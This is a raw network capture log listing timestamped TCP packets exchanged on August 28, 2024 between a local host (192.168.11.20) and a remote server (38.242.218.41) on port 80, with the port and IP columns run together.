                                        Aug 28, 2024 12:25:21.088330984 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088432074 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088445902 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088458061 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088469028 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088499069 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088614941 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088617086 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.088617086 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.088645935 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088658094 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088787079 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.088787079 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.088787079 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.088787079 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.273863077 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.273886919 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.273906946 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.273930073 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274199009 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.274199009 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.274241924 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274271965 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274331093 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274388075 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274460077 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274481058 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274498940 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274517059 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274521112 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.274521112 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.274534941 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274547100 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.274744987 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.274920940 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274950981 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274971962 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.274991035 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.275011063 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.275031090 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.275049925 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.275088072 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.275423050 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.459445953 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.459574938 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.459671021 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.459752083 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.459757090 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.459858894 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.459928036 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.459983110 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460041046 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460068941 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460068941 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460095882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460159063 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460216999 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460216999 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460309982 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460376978 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460432053 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460432053 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460432053 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460486889 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460541010 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460596085 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460613012 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460649967 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460705996 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460716963 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460716963 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460762024 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460886955 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.460901022 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.460930109 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461025000 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461057901 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461057901 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461059093 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461122990 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461188078 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461244106 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461281061 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461298943 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461354017 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461462021 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461467028 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461463928 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461463928 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461463928 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461523056 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461566925 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461579084 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461633921 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461688042 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461741924 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461796045 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461800098 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461800098 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461800098 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.461850882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461905003 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.461967945 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.462009907 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.462014914 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.462069988 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.462132931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.462132931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.462132931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.462132931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.462311029 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.462311983 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.462311983 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.647141933 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647264957 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647332907 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647345066 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.647399902 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647607088 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647631884 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.647631884 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.647768974 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647833109 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647890091 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.647972107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.647972107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648139954 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648196936 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648318052 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648324013 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648420095 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648487091 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648483992 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648484945 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648583889 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648678064 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648758888 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648775101 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648776054 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648817062 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648873091 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648926020 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.648946047 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.648982048 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649039030 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649091959 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649113894 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649113894 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649113894 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649147987 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649203062 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649255991 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649290085 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649311066 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649466991 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649466991 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649502039 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649600983 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649626017 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649694920 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649765968 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649772882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649833918 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649924994 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.649938107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.649938107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650017977 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650110960 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650114059 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650111914 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650183916 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650239944 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650275946 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650275946 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650294065 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650348902 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650402069 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650440931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650440931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650458097 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650540113 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650608063 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650609016 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650609016 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650664091 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650717974 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650789022 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650793076 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650876999 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650934935 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.650959015 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.650990963 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651046038 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651099920 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651129007 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651129007 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651129007 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651154041 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651209116 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651263952 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651299953 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651319027 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651375055 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651429892 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651478052 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651479006 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651484013 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651539087 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651595116 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651631117 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651631117 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651649952 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651705027 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651760101 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651778936 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651779890 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651813984 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651870012 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651925087 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651947021 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651947021 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651957989 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651972055 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651985884 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651999950 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652014017 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652028084 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652041912 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652115107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652115107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652120113 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652122974 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652122974 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652123928 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652124882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652126074 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652136087 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652149916 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652285099 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652285099 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652291059 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652453899 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652622938 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832353115 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832387924 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832546949 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832561970 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832576036 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832679033 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832690001 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832705021 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832748890 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832767963 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832782984 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832782984 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832840919 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832854986 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832983017 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.833152056 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.833152056 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.833976030 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.833991051 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.834192991 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.834323883 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837083101 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837179899 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837193012 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837244987 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837310076 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837414980 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837524891 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837538958 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837549925 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837560892 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837585926 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837734938 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837749958 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837754965 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837779999 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837791920 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837805033 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837824106 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837836027 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837846994 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837860107 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837873936 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837884903 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837924957 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837924957 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838011980 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838044882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838057041 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838094950 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838160038 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838179111 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838217020 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838320971 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838326931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838430882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838443041 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838496923 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838530064 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838630915 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838644981 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838668108 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838668108 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838675976 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838687897 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838836908 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838838100 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838850021 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838861942 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838872910 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838891029 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838901997 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838996887 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839073896 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839118004 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839167118 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839215994 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839232922 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839304924 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839317083 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839328051 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839337111 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839337111 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839400053 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839507103 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839524031 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839581966 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839592934 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839605093 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839652061 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839678049 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839678049 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839678049 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839711905 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839761019 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839812994 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839848042 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839900017 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839952946 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840018034 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840018034 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840073109 CEST804986538.242.218.41192.168.11.20
